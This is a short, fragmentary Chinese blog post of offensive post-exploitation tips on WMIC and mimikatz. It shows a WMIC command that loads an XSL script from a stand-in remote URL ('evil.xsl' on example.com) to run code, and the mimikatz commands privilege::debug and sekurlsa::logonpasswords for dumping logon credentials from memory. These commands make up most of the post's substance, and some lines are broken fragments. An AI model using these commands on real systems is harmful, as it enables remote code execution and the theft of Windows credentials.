wmic与mimikatz技巧

wmic与mimikatz技巧

前言

是比cmd强大的命令行。轻量级调试器神器，后渗透常用，可以说是您居家旅行杀人灭口必备良器

测试wmic

使用wmic能够从本地或从URL调用XSL（可扩展样式表语言）脚本。

本地：

wmic process list /FORMAT:evil.xsl

远程：

wmic os get /FORMAT:"https://example.com/evil.xsl"

privilege::debug

sekurlsa::logonpasswords

OK

项目：地址升级版演示

总结

emmmm，多关注墙外的知识。参考(抄袭)：https://www.secpulse.com/archives/71380.htmlhttps://www.t00ls.net/viewthread.php?tid=45774&extra=&page=1